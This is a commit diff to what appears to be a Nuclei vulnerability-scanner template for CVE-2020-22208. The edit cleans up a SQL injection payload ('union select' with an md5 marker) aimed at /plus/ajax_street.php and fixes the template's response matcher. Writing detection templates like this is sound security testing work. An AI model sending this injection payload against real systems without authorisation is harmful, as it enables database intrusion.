Update CVE-2020-22208.yaml

patch-1
Prince Chaddha 2022-06-05 17:15:29 +05:30 committed by GitHub
parent f79c2d50f2
commit 1a54b625b8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 2 deletions

View File

@ -23,10 +23,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11<EFBFBD>' union select%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
- "{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11' union select%201,2,3,md5({{randstr}}),5,6,7,8,9%23"
matchers:
- type: word
part: body
words:
- "md5({{randstr}})"
- '{{md5("{{randstr}}")}}'